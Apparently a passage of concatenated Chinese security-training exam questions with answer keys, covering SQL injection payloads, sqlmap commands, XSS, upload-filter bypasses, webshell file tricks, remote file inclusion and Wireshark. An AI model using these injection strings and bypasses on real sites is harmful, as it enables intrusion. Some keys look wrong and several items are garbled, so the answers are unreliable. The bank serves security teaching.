A、 http://www.****.com/***.asp?id=XX
B、 http://www.****.com/***.php?name=XX&page=99
C、 http://www.****.com/index/new/php-8.html
D、 http://www.****.com/news.html
您的答案: 标准答案: D
38、下列 mysql 的 PHP 函数说法错误的是()
A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接
B、 mysql_db_select($database, $conn); 选择数据库
C、 mysql_query($sql, $conn); 执行 SQL 语句
D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中
您的答案: 标准答案: B
39、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()
A、 对
B、 错
您的答案: 标准答案: A
40、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()
A、 用户名输入: '(或") AND 1 = 1-- ;密码随便输入
B、 用户名输入: '(或") && 1 = 1-- ;密码随便输入
C、 用户名输入: '(或") OR 1 = 1-- ;密码随便输入
D、 用户名输入: '(或") || 1 = 1-- ;密码随便输入
您的答案: 标准答案: C
41、已知 SQL 语句为: s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `member` WHERE `username` = "'. sql=′SELECT∗FROM‘member‘WHERE‘username‘="′._GET[‘name’].’" AND password
= “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin" OR “1”=“2&pwd=” OR “1”="1 时,可以完成用户验证吗()
A、 对
B、 错
您的答案: 标准答案: A
42、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `memeber` WHERE `username` = "'. sql=′SELECT∗FROM‘memeber‘WHERE‘username‘="′.user.’" AND pass
= “’.$pass.’”’,下列能成功执行注入的是()
A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;
B、 $user = ‘admin OR 1 = 2’; $pass = ‘" OR 1 = 1’;
C、 $user = ‘admin" OR 1 = 1’; $pass = ‘" OR 1 = 2’;
D、 $user = ‘admin" OR “1” = "2’; $pass = ‘" OR “1” = "1’;
您的答案: 标准答案: D
43、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()
A、 对
B、 错
您的答案: 标准答案: A
44、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()
A、 4
B、 5
C、 6
D、 7
您的答案: 标准答案: B
45、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()
A、 5
B、 6
C、 7
D、 8
您的答案: 标准答案: B
46、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()
A、 所有数据库
B、 所有表
C、 所有字段
D、 所有字段类型
您的答案: 标准答案: A
47、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()
A、 TABLES
B、 SCHEMATA
C、 COLUMNS
D、 DATABASES
您的答案: 标准答案: B
48、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
49、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()
A、 SELECT user(),version(),database();
B、 SELECT user(),’,’,version(),’,’,database();
C、 SELECT user().version().database();
D、 SELECT group_concat(user(),version(),database());
您的答案: 标准答案: D
50、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()
A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;
B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;
C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;
D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;
您的答案: 标准答案: B
1、下列有关 ASP、PHP 接受参数的方式错误的是()
A、 ASP:request.get(接收 get 传参)
B、 PHP:$_GET(接收 get 传参)
C、 ASP:request(全部接收)
D、 PHP:$_REQUEST(全部接收)
您的答案: 标准答案: A
2、当使用 Burp 进行 Cookie 手工注入的时候,下列可以判断是否报错的是()
A、 X-Powered-By
B、 Content-Length
C、 Content-Type
D、 Cache-control
您的答案: 标准答案: B
3、下列命令能实现 SQLMap Cookie 注入的是()
A、 sqlmap.py -u “http://www.xxx.com/product.php?id=58”
B、 sqlmap.py -u “http://www.xxx.com/product.php” --data “id=58”
C、 sqlmap.py -u “http://www.xxx.com/product.php” --data “id=58” --level 1
D、 sqlmap.py -u “http://www.xxx.com/product.php” --cookie “id=58” --level 2
您的答案: 标准答案: D
4、XSS属于服务端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一
A、 对
B、 错
您的答案: 标准答案: B
5、存储型XSS,持久化,代码是存储在服务器中的;反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码
A、 对
B、 错
您的答案: 标准答案: A
6、下面属于隐蔽型的 XSS 的选项是:
A、 反射型 XSS
B、 存储型 XSS
C、 不持久型 XSS
您的答案: 标准答案: B
7、当网站对
A、 alert(1)
B、
C、
D、 alert(1)
您的答案: 标准答案: C
8、XSS能够对网站进行攻击且造成网站权限丢失()
A、 对
B、 错
您的答案: 标准答案: B
9、下面上传突破说法错误的是()
A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传
B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传
C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破
D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破
您的答案: 标准答案: D
10、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
11、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()
A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面
B、 直接在抓的包中修改 Content-Type
C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00
您的答案: 标准答案: C
12、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()
A、 对
B、 错
您的答案: 标准答案: A
13、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()
A、 上传文件 shell.PhP
B、 上传文件 shell.php4
C、 上传文件 shell.php3
D、 上传文件 shell.php .jpg
您的答案: 标准答案: A
14、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()
A、 对
B、 错
您的答案: 标准答案: A
15、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()
A、 对
B、 错
您的答案: 标准答案: A
16、下列即属于黑名单检测绕过又属于白名单检测绕过的是()
A、 文件名大小写绕过
B、 名单列表绕过
C、 特殊文件名绕过(windows)
D、 0x00 截断绕过
您的答案: 标准答案: D
17、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
18、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()
A、 http://www.mubiao.com/file.php?read=../../../image/shell.php
B、 http://www.mubiao.com/file.php?read=/image/shell.php
C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php
D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php
您的答案: 标准答案: D
19、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: B
20、对第三方组件慎重使用说法错误是():
A、 尽量从官方渠道下载第三方组件
B、 对第三方组件的安全测试
C、 对第三方组件不需要安全加固、补丁更新
D、 对第三方组件的定期升级计划
您的答案: 标准答案: C
21、为了减少编程错误引起的安全缺陷,Java开发者不应该遵循建议的安全开发规范。()
A、 对
B、 错
您的答案: 标准答案: B
22、通过恶意手段耗尽被攻击对象的资源,让目标计算机或网络服务无法提供正常的服务、资源访问,使目标服务系统停止响应崩溃。
A、 对
B、 错
您的答案: 标准答案: A
23、下面这段XML代码,当程序加载的时候,会尝试写一段代码到/dev/tty文件里。
A、 对
B、 错
您的答案: 标准答案: B
24、JAVA出现数组越界,不会抛出异常,会继续执行。
A、 对
B、 错
您的答案: 标准答案: B
25、安全部署前、中、后的那一句是正确的():
A、 部署后进行漏洞扫描,渗透测试,日常运维,包括WEB漏洞扫描
B、 发现缺陷部署前,不需要对软件安全检测
C、 基础软件的安全性不影响将来承载的应用软件的安全性
D、 部署中应关闭上线过程临时开放的端口服务
您的答案: 标准答案: A
26、常见的安全需求主要包括:身份认证,会话管理,访问控制,权限管理,数据保护,安全审计,异常处理。()
A、 对
B、 错
您的答案: 标准答案: B
27、访问控制有两个方面:限制用户对资源的访问,资源请求数量限制。对IP进行控制,采用统一的访问控制机制,在服务器端实现访问控制。()
A、 对
B、 错
您的答案: 标准答案: A
28、对于源代码审计安全缺陷,不是外部输入风险的是():
A、 终端输入数据
B、 第三方来源的数据
C、 拒绝服务的防御
D、 数据库中的数据
您的答案: 标准答案: C
29、源代码审计配置文件说法错误的是():
A、 已知恶意的数据拉入黑名单,白名单只允许少数机器访问
B、 账号长度避免使用弱口令,限制输入次数错误的登录
C、 记录日志安全不需要开启服务
D、 执行化配置文件存储了开发的信息,弱口令,连接地址,通讯方式等
您的答案: 标准答案: C
30、下面代码是动态构造的,不是典型的动态sql注入。():
A、 对
B、 错
您的答案: 标准答案: B
31、下面代码中,使用指针p之前没有检查p是否为空,不造成安全隐患。()
A、 对
B、 错
您的答案: 标准答案: B
32、下面代码中,判断指针p是否为NULL,判断前调用log函数没使用p,NULL指针引用没问题。()
A、 对
B、 错
您的答案: 标准答案: B
33、关于Windows2003版本说法正确的是():
A、 Windows2003标准版有Web版本的所有功能
B、 Windows2003标准版增加了Metadirectory Services Support、集群、热添加(Hot-Add)内存、终端服务会话目录等功能,还增加一个支持64位计算版本
C、 Windows2003 Web版有全部版本的所有功能
D、 Windows2003企业版支持高达8-32路处理器,64G内存,8节点的集群,增加了一个数据中心程序包
您的答案: 标准答案: A
34、下面添加或删除Windwos程序正确说法是():
A、 添加/删除Windows组件可以安装第三方网络服务
B、 Windows网络服务每一个对应的软件在系统里面不是一个组件
C、 添加/删除Windows组件可以添加终端服务组件
D、 更改或删除程序里可以删除安装程序和Windows组件
您的答案: 标准答案: C
35、连接到Internet和连接到工作区,连接错误是():
A、 连接到Internet,用拨号调制解调器连接
B、 连接到我的工作场所创建VPN网络,虚拟专用网络连接
C、 连接到Internet,用要求用户名和密码的宽带连接来连接
D、 连接到我的工作场所创建VPN网络,直接拨号连接
您的答案: 标准答案: D
36、本地连接Internet(TCP/IP)属性设置错误是():
A、 DHCP自动对局域网所有用户计算机分配IP地址
B、 设置静态IP,DNS不填写,可以连接到网络
C、 默认网关参数不设置,不能连接网络
D、 子网掩码默认自动获取
您的答案: 标准答案: B
37、本地系统账户和域用户账户的区别说法错误的是():
A、 本地系统账户是本机建立的用户账户,域账户是域服务器上由管理员分配给你的账户
B、 域账户是域控制器上创建的账户,所有域账户都不属于domain users组
C、 域管理员帐号属于domain admins组,具有管理域控制器的权限
D、 本地账户可以登录到域上,并获得访问该网络的权限
您的答案: 标准答案: B
38、使用Administrator对计算机或配置进行管理正确的是():
A、 本地Administrator账户可以更名,也可以删除
B、 Administrator账户不能完全控制整台计算机
C、 在执行管理任务时使用普通用户,执行非管理用户是使用Administrator管理员
D、 Administrator账户可以创建修改用户账户和组,管理安全策略,创建打印机,分配允许用户访问资源的权限等
您的答案: 标准答案: D
39、对于内置组账户和创建新组账户说法错误是():
A、 创建新组账户是在本地安全设置里用户权限分配设置
B、 内置组账户具有完全控制、从网络访问计算机、调整进程的内存配额、允许本地登录、指派等权限
C、 系统内置默认的组账户都不能删除
D、 创建新组用户有内置用户组的所有权限
您的答案: 标准答案: D
40、下面对NTFS文件系统功能说法错误的是():
A、 可以设置权限
B、 磁盘映射访问
C、 文件加密
D、 磁盘配额
您的答案: 标准答案: B
41、文件夹和文件权限定义说法错误的是():
A、 文件夹权限:完全控制,可以执行所有操作
B、 文件权限:完全控制,特别的权限
C、 文件权限:修改,读取,运行,写入
D、 文件夹权限:与文件和文件夹的数据有关,与安全选项卡读取、更改无关
您的答案: 标准答案: D
42、NTFS文件系统相对于FAT和FAT32文件系统来说,对文件资源保护,文件资源的安全性存在风险。()
A、 对
B、 错
您的答案: 标准答案: B
43、复制操作:不同NTFS分区和同NTFS分区都继承目的地权限。()
A、 对
B、 错
您的答案: 标准答案: A
44、移动操作:同NTFS分区移动不保留原有权限,不同NTFS分区移动则继承目的地权限。()
A、 对
B、 错
您的答案: 标准答案: B
45、DHCP服务器中的设置数据全部存放在名为dhcp.mdb数据库文件中,该文件位于Windows\ SysWOW64\dhcp文件夹内。()
A、 对
B、 错
您的答案: 标准答案: B
46、DHCP服务器和DHCP客户端处于不同的广播域,如何解决?()
A、 解除三层设备
B、 转发广播报文
C、 关闭广播中继
D、 开启DHCP中继功能
您的答案: 标准答案: D
47、在大型网络中,每台终端的地址都是有不同的使用来分配,出现地址相同,不会发生冲突。()
A、 对
B、 错
您的答案: 标准答案: B
48、如果要解析一个网站IP,在本地连接“设置DNS服务器地址”域到查询请求的IP,置顶向下解析正确的是():
A、 本地域名服务器,查缓存、本地数据库,二级域名服务器,顶级域名服务器,根域名服务器,返回结果
B、 根域名服务器,二级域名服务器,顶级域名服务器,返回结果
C、 查缓存、本地数据库,根域名服务器,顶级域名服务器,二级域名服务器,返回结果
D、 本地域名服务器,根域名服务器,顶级域名服务器,二级域名服务器,返回结果
您的答案: 标准答案: D
49、对DNS的数据文件说法错误的是():
A、 区域的数据都是存储在DNS服务器内的区域文件内
B、 区域文件和缓存文件存储在“%systemroot%\SysWOW64\dns”
C、 缓存文件存储着根域内的DNS服务器名称与IP地址的对照数据
D、 区域文件名为zonename.dns,缓存文件名为cacheddns
您的答案: 标准答案: B
50、在ftp传输过程中,为了定位ftp传输开始的数据包位置,筛选器的命令应该是
A、 ftp.request.command==
B、 ftp.request.command==
C、 ftp.request.command==
D、 ftp.request.command ==
您的答案: 标准答案: C
1、wireshark哪个功能可以提取传输文件
A、 flow graph
B、 throughput graph
C、 follow tcp stream
D、 udp multicast streams
您的答案: 标准答案: C
2、wireshark通信流量图可以提供ftp通信的快速视图
A、 对
B、 错
您的答案: 标准答案: A
3、在wireshark所抓数据包分析里,客户端出现响应延迟的标志是
A、 初始握手SYN,ACK包time值较高
B、 初始握手后的GET包time值较高
C、 初始握手后的ACK包time值较高
您的答案: 标准答案: B
4、在wireshark所抓数据包分析里,SYN响应包是ACK
A、 对
B、 错
您的答案: 标准答案: B
5、在wireshark所抓数据包分析里,拆除SSL连接的数据包是哪个
A、 FIN,ACK
B、 SYN,ACK
C、 ACK
D、 SYN
您的答案: 标准答案: A
6、处于同一网络内可以拦截https明文传输内容
A、 对
B、 错
您的答案: 标准答案: B
7、在wireshark中若捕获了30个DNS数据包,则说明捕获的数据包中存在有多少个DNS相关事务
A、 30个
B、 15个
C、 10个
您的答案: 标准答案: B
8、通过wireshark哪个功能可以查看http请求的所有域名的统计信息
A、 statistics的conversations功能
B、 statistics的collectd功能
C、 statistics的http功能
您的答案: 标准答案: C
9、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗
A、 对
B、 错
您的答案: 标准答案: A
10、目标服务器端口关闭时,扫描器会
A、 没有收到数据包
B、 收到RST数据包
C、 收到SYN/ACK数据包
D、 收到FIN/ACK数据包
您的答案: 标准答案: B
11、筛选端口号为443的所有数据包时过滤器的语句是tcp.dstport==443
A、 对
B、 错
您的答案: 标准答案: B
12、扫描windows系统时收到的TTL是
A、 64
B、 128
C、 255
您的答案: 标准答案: B
13、nmap可以进行主动扫描
A、 对
B、 错
您的答案: 标准答案: A
14、ARP攻击成功后的标志是
A、 HTTP包中远程地址不变,MAC地址变为攻击者地址
B、 HTTP包中MAC地址不变,远程地址变为攻击者地址
C、 HTTP包中MAC地址和远程地址均变成攻击者的地址
您的答案: 标准答案: A
15、攻击者的ARP包中目标MAC地址指向被攻击的MAC地址
A、 对
B、 错
您的答案: 标准答案: A
16、通过wireshark哪个功能可以查找快速特定字符串
A、 Filter
B、 Find Packet
C、 Follow TCP Stream
您的答案: 标准答案: B
17、JPG文件头的十六进制码是
A、 47 49
B、 FF D8
C、 89 50
您的答案: 标准答案: B
18、在wireshark中使用IO Graphs可以查看会话流,这种说法对吗
A、 对
B、 错
您的答案: 标准答案: A
19、手机中广泛使用的协议是
A、 DNS
B、 TCP
C、 UDP
您的答案: 标准答案: C
20、在wireshark捕获的数据包中,通过哪些字段可以获得浏览器及系统版本相关信息
A、 Host
B、 Accept-Language
C、 Cookie
D、 User-Agent
您的答案: 标准答案: D
21、wireshark过滤器中输入dns可以显示所有dns相关的数据包
A、 对
B、 错
您的答案: 标准答案: A
22、apache核心配置文件是
A、 /etc/http/conf/http.conf
B、 /etc/httpd/conf/http.conf
C、 /etc/http/conf/httpd.conf
D、 /etc/httpd/conf/httpd.conf
您的答案: 标准答案: D
23、apache配置文件中的代表的是
A、 系统根目录
B、 用户根目录
C、 网站根目录
D、 配置目录
您的答案: 标准答案: C
24、网站默认页可以在apache文件中的哪个标签中设置
A、 AccessFileName
B、 Files
C、 Directory
D、 DirectoryIndex
您的答案: 标准答案: D
25、若需要设置访问认证,则应该在哪个文件中配置
A、 index.html
B、 .htaccess
C、 http.conf
您的答案: 标准答案: B
26、检查apache是否安装的命令是rpm -q httpd
A、 对
B、 错
您的答案: 标准答案: A
27、在ftp配置中,若要允许匿名用户登陆则应如何配置
A、 guest_enable=YES
B、 local_enable=YES
C、 anonymous_enable=YES
您的答案: 标准答案: C
28、检查apache是否安装的命令是rpm -q vsftp
A、 对
B、 错
您的答案: 标准答案: B
29、Sendmail服务器的配置文件是
A、 /etc/mail/sendmail.mc
B、 /etc/mail/sendmail.conf
C、 /etc/sendmail/sendmail.mc
D、 /etc/sendmail/sendmail.conf
您的答案: 标准答案: A
30、Sendmail的access文件中代表返回错误信息的是
A、 OK
B、 REJECT
C、 DISCARD
D、 RELAY
您的答案: 标准答案: B
31、Sendmail的别名功能不能进行转发
A、 对
B、 错
您的答案: 标准答案: B
32、jQuery在哪个版本以下存在公开的XSS漏洞?( )
A、 1.5
B、 1.6
C、 1.7
D、 1.8
您的答案: 标准答案: C
33、目录浏览漏洞是由于哪项配置不当引起的?( )
A、 Web服务权限
B、 数据库配置
C、 服务器端口
D、 输入输出过滤
您的答案: 标准答案: A
34、下列哪项不属于移动端应用安全防护措施?()
A、 加壳
B、 代码混淆
C、 完整性验证
D、 WAF
您的答案: 标准答案: D
35、下列哪项不属于移动应用安全检测分析中对数据安全性的检测?()
A、 数据输入
B、 输入存储
C、 数据复制数据输出
D、 MAC地址
您的答案: 标准答案: C
36、使用Apktool对apk文件进行反编译,得到程序文件是什么语言?( )
A、 Java
B、 Smali
C、 C++
D、 ARM
您的答案: 标准答案: B
37、使用apktool进行回编译应该使用哪个参数?( )
A、 s
B、 b
C、 rf
D、 d
您的答案: 标准答案: B
38、要抓取移动设备HTTPS的数据包,需要在该设备上进行那种设置?
A、 安装ca证书
B、 安装Burp Suite
C、 Root
D、 修改Host
您的答案: 标准答案: A
39、渗透测试的流程中不包含以下哪些流程
A、 信息搜集
B、 渗透测试
C、 痕迹清除
D、 后门植入
您的答案: 标准答案: D
40、应用层收集的信息不包括以下哪种
A、 Web服务器指纹
B、 网站后台
C、 DNS域传送漏洞
D、 服务器提供商
您的答案: 标准答案: D
41、认证与会话部分经常出现的漏洞有哪些
A、 目录遍历
B、 文件包含
C、 XSS
D、 Session劫持
您的答案: 标准答案: D
42、以下哪款工具可以判断目标网站是否使用了WAF?( )
A、 Nmap
B、 nslookup
C、 wafw00f
D、 Ping
您的答案: 标准答案: C
43、Nslookup的作用是什么?()
A、 查询目标网站的DNS解析
B、 查看目标站点的操作系统版本
C、 对目标服务器的开放端口进行扫描
D、 爆破邮箱密码
您的答案: 标准答案: B
44、解决企业中安全事件流程繁琐踢皮球的有效方式是什么? ( )
A、 建立安全评审组
B、 成立SRC
C、 设置安全响应机制
D、 购买安全服务
您的答案: 标准答案: A
45、风险评估的目的是更好地了解风险、把握风险,并对风险作出防范措施
A、 对
B、 错
您的答案: 标准答案: A
46、利用IBM Security Appscan Standard工具扫描网站时,如果目标网站过大,可以采用哪种方式提高效率?( )
A、 正则表达式
B、 环境定义
C、 自动表单填充
D、 多步骤操作
您的答案: 标准答案: A
47、风险评估过程中,通过相关工具发现网站漏洞后,接下来应该就进行的操作是什么?( )
A、 上传后门
B、 总结并上报
C、 置之不理
D、 帮忙修复
您的答案: 标准答案: B
48、纳入企业安全体系中的工作流程有哪些?( )
A、 代码上线
B、 安全意识培养
C、 绩效管理
D、 产品设计
您的答案: 标准答案:
49、防御文件包含漏洞的方法不包括()
A、 避免外界指定文件名
B、 拒绝上传文件
C、 文件名中不可包含目录名
D、 限定文件名中仅包含字母与数字
您的答案: 标准答案: B
50、Linux中,mod_security安装成功后,安装在下面哪个文件夹中?()
A、 /var/mod_security
B、 /apache
C、 /etc/init.d
D、 /home/user
您的答案: 标准答案: B
1、Linux中,mod_security安装成功后,安装在下面哪个文件夹中?()
A、 /var/mod_security
B、 /apache
C、 /etc/init.d
D、 /home/user
您的答案: 标准答案: B
2、Linux环境搭建中,如果出现IPV4地址与DVWA不吻合,需要在编辑哪个文件()?
A、 /etc/hosts
B、 /etc/file
C、 /var/www/dvwa
D、 /etc/address
您的答案: 标准答案: A
3、如果部署于计算机的有WAF经常出现误报的现象,有哪些有效的解决方法?( )
A、 注销规则
B、 修改阈值
C、 检测服务器
D、 对规则进行过滤
您的答案: 标准答案: B
4、Snort中匹配到sqlmap关键字,但实际并没有遭受攻击,原因是有可能是什么?( )
A、 系统自我修复
B、 攻击者无法注入
C、 规则不严谨
D、 攻击者未攻击成功
您的答案: 标准答案: C
5、snort规则代码中每修改一次,版本号要增加1,表示版本号的是()
A、 msg
B、 content
C、 sid
D、 rev
您的答案: 标准答案: D
6、对攻击者入侵调查取证原则不包括()
A、 找到事件本质
B、 多尝试
C、 逆向思考
D、 搜集攻击者信息
您的答案: 标准答案: D
7、当发现攻击者进行SQL注入攻击时被拦截并获取其IP地址时,应当如何处理?()
A、 追踪攻击者的痕迹
B、 备份并查看日志,保存证据
C、 不当回事
D、 直接告诫攻击者
您的答案: 标准答案: B
8、Python通过哪个模块对正则表达式提供支持?( )
A、 re
B、 time
C、 sys
D、 thread
您的答案: 标准答案: A
9、Python正则表达式模块,使用“\D”来匹配什么内容?( )
A、 字母
B、 非字母
C、 数字
D、 非数字
您的答案: 标准答案: D
10、Python正则表达式模块,使用“{m}”的匹配什么内容?( )
A、 匹配前一个字符m次
B、 匹配后一个字符m次
C、 匹配长度为m的单词
D、 匹配长度为m的数字
您的答案: 标准答案: A
11、使用贪婪模式“ab*”来匹配“abbbcba”得到的结果是?( )
A、 ab
B、 abbb
C、 abbbcb
D、 abbbc
您的答案: 标准答案: B
12、若想匹配出“
A、
B、
C、 div class=“coursename”> title="(.*?)" onclick …… ”
D、
您的答案: 标准答案: C
13、Python中若是用ulrlib库请求指定URL页面的内容,应该使用哪个函数?( )
A、 urlopen()
B、 add_header
C、 fileopen()
D、 sleep()
您的答案: 标准答案: A
14、Python中安装第三方库应该使用什么命令?( )
A、 pip install
B、 apt-get install
C、 brew cask install
D、 yum
您的答案: 标准答案: A
15、Python的request库中,是用什么方式查看返回的HTTP状态码?( )
A、 requests.statuscode
B、 requests.responsecode
C、 requests.header
D、 requests.cookie
您的答案: 标准答案: A
16、假如在编写爬虫时,目标网站进行了防爬处理,应该在代码中添加什么内容?( )
A、 将抓取的内容解密
B、 设置请求的header
C、 设置请求的cookie
D、 更换请求类型
您的答案: 标准答案: B
17、以下关于进程和线程的描述错误的是?
A、 每个进程都有自己的内存地址空间和数据栈
B、 一个进程至少有一个线程
C、 线程能够独立执行
D、 同一个进程的多线程,可以共享内容空间
您的答案: 标准答案: C
18、Python中可以使用threading模块进行多线程程序的编写,一个新的线程的开启应当使用哪个函数?
A、 t.join()
B、 t.start_new_thread()
C、 t.append()
D、 t.sleep()
您的答案: 标准答案: B
19、在Python多线程程序中引入Queue模块可以解决什么问题?()
A、 生产参数和计算结果时间不确定的问题
B、 Thread模块不能分布式编程的问题
C、 Thread模块性能不足的问题
D、 多线程操作变量混乱的问题
您的答案: 标准答案: C
20、在不考虑硬件环境的前提下,Python中Queue的长度可以是无限的。
A、 对
B、 错
您的答案: 标准答案: A
21、Queue模块有多重队列产生模式,其默认的队列模式是什么?( )
A、 FIFO
B、 LIFO
C、 FEFO
D、 LEFO
您的答案: 标准答案: A
22、C/S架构中,C和S分别代表什么?( )
A、 Client和Sever
B、 Computer和Signal
C、 Computer和Socket
D、 Client与Socket
您的答案: 标准答案: A
23、网络化的应用程序在开始仁和通讯之前都必须创建套接字。
A、 对
B、 错
您的答案: 标准答案: A
24、Python中的Socket模块里,用于发送UDP数据的是什么函数?( )
A、 s.send()
B、 s.recv()
C、 s.sendall()
D、 s.sendto()
您的答案: 标准答案: D
25、在Python没有DB API之前,通过什么方式对数据库进行操作?( )
A、 数据库GUI接口
B、 数据库接口程序
C、 SQLmap
D、 PHPMyAdmin
您的答案: 标准答案: B
26、如何建立Python客户端与MySQL数据库的网络连接?( )
A、 MySQLdb.Connect
B、 Cursor.execute()
C、 Connection.cursor
D、 Connection.close
您的答案: 标准答案: A
27、Python数据库编程中如何执行一条数据库查询指令?( )
A、 execute(op[,args])
B、 fetchone()
C、 fetchall()
D、 rowcount
您的答案: 标准答案: A
28、以下哪个选项的内容可以创建一个FSO对象(IIS内置组件),用于操作磁盘文件?()
A、 set fso=server.createobject(“scripting.filesystemobject”)
B、 set fso=server.createobject(“scripting.filesystem”)
C、 set fso=request.createobject(“scripting.filesystemobject”)
D、 set fso=request.createobject(“scripting.fileobject”)
您的答案: 标准答案: A
29、Windows下执行cmd命令"copy 1.txt \.\c:\aux.txt",生成的aux.txt要如何删除呢?()
A、 del c:\aux.txt
B、 del aux.txt
C、 del \.\c:\aux.txt
D、 del .\c:\aux.txt
您的答案: 标准答案: C
30、通过IIS内置组件FSO对象的哪个方法可以创建一个文件操作对象?()
A、 createtextfile
B、 createbufferfile
C、 gettextfile
D、 getbufferfile
您的答案: 标准答案: A
31、IIS无法禁止用户下载以mdb为尾缀的文件。
A、 对
B、 错
您的答案: 标准答案: B
32、PHP中哪个函数可以创建一个新文件?()
A、 fopen
B、 fwrite
C、 fclose
D、 fgetfile
您的答案: 标准答案: A
33、PHP函数isset()的功能是什么?()
A、 检测变量是否为空
B、 检测变量是否为数字
C、 检测变量是否设置值
D、 检测变量是否为字符串
您的答案: 标准答案: C
34、以下哪个PHP的伪协议可以接收POST数据?()
A、 php://input
B、 php://fd
C、 php://filter
D、 php://temp
您的答案: 标准答案: A
35、以下哪种文件名称可以利用Apache的解析漏洞来运行脚本?()
A、 test.jpg.html
B、 test.php.xxx
C、 test.jpg.xxx
D、 test.html.xxx
您的答案: 标准答案: B
36、存在解析漏洞的Apache会将test.html.x1.x2.x3文件识别为html文件。
A、 对
B、 错
您的答案: 标准答案: A
37、网络安全防护体系在战略方面应该以什么为核心?()
A、 技术
B、 人
C、 设备
D、 网络
您的答案: 标准答案: B
38、网络安全防护体系在战术方面应该以什么为手段?()
A、 技术
B、 攻防
C、 情报
D、 设备
您的答案: 标准答案: C
39、网络安全威胁情报的八个核心要素不包括以下哪个选项?()
A、 被攻击系统
B、 设备
C、 动机
D、 威胁源
您的答案: 标准答案: B
40、缩短攻击者的自由攻击时间成为了安全事件应急响应的关键。
A、 对
B、 错
您的答案: 标准答案: A
41、以下哪个选项的标准不属于网络安全威胁情报?()
A、 TAXII
B、 Cybox
C、 TCIA
D、 STIX
您的答案: 标准答案: C
42、威胁情报进行信息共享过程中要注意信息的隐私问题。
A、 对
B、 错
您的答案: 标准答案: A
43、Wireshark命令行下查看文件概述信息的命令是()
A、 test2pcap
B、 capinfos
C、 rawshark
D、 tshark
您的答案: 标准答案: B
44、使用tshark从数据包筛选出指定IP地址的数据包文件命令是()
A、 tshark -r x.pcapng -Z “ip.addr==192.168.0.1” -w x2.pcapng
B、 tshark -r x.pcapng -V “ip.addr==192.168.0.1” -w x2.pcapng
C、 tshark -r x.pcapng -Y “ip.addr==192.168.0.1” -w x2.pcapng
您的答案: 标准答案: C
45、使用tshark查看数据包的TCP会话信息的命令()
A、 tshark -n -q -r x.pcap -z “conv.tcp”
B、 tshark -n -q -r x.pcap -z “smb.srt”
C、 tshark -n -q -r x.pcap -z “smb.srt”
您的答案: 标准答案: A
46、Wireshark环境下,使用Editcap x.pcapng output.pcapng -i 4命令的作用是()
A、 文件包切分成4个文件
B、 每四秒为间隔切分成一个文件
C、 每四分钟为间隔切分成一个文件
您的答案: 标准答案: B
47、IP地址位于IOS七层模型的哪一层()
A、 会话层
B、 网络层
